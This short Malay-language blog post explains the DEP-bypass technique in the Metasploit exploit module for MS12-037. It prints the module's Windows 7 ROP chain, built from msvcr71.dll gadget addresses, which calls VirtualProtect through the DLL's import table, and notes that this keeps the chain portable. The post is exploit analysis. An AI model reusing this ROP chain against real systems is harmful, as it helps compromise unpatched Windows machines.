metasploit: ms12-037
Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1
Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)
Ada 2 rop implementation, satu utk xp sp3, satu lagi utk win7 sp1
Merujuk rop utk win7 sp1, guna msvcr71.dll( jre-6 update-26)
0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0x00001000, # (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0x00000040, # flNewProtect 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret '
Baris 3 terakhir: (0x7c37a151 + 0x0EF )adalah merujuk kepada lokasi kawasan yang mana maklumat IAT disimpan utk dll msvcr71.dll. Data dalam alamat tersebut adalah pointer kepada kernel32.VirtualProtect.
Jadi, walaupun address hard-coded digunakan utk call VirtualProtect, tapi shellcode ini tetap portable.
Kudos to metasploit for expose this nice trick.
No comments:
Post a Comment
Terima kasih